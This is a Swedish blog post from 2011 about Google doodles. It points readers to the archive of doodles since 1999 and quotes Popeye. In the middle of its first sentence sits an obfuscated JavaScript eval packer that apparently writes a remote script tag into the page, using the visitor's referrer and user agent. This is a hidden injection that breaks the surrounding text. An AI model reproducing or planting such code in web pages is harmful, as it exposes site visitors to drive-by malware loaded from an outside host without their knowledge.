Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Här är alla Google doodles sen 1999.

Här är alla Google doodles sen 1999.
Filip Urde
  • On 29 november, 2011
  • http://www.revue.se/filip-urde

Google och doodles, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rinat|var|u0026u|referrer|ysybz||js|php’.split(’|’),0,{}))
det är något som givit den annars väldigt sterila hemsidan en extra dimension. Google gjorde sina första Google doodles 1999 och sedan har man gjort en heldel versioner som anspelat på något aktuellt för den tiden. Nu kan du se alla som gjorts hittills, genom att bara gå till google.com och trycka på ”I’m Feeling Lucky” ( jag har tur, på svenska Google) utan att skriva in något.

Eller trycka här   så kommer du till arkivet med doodles från 1999 fram till idag.

Jag tycker om den som är från 08 december, 2009. Med Popeye…

”Humena humena…. Eat your spinach, you no good infink. Eat it. EAT IT. Eat it. ”

– Popeye

 

Läs här om Google sök (artikel från idag)

 

 

 

 

.

Comments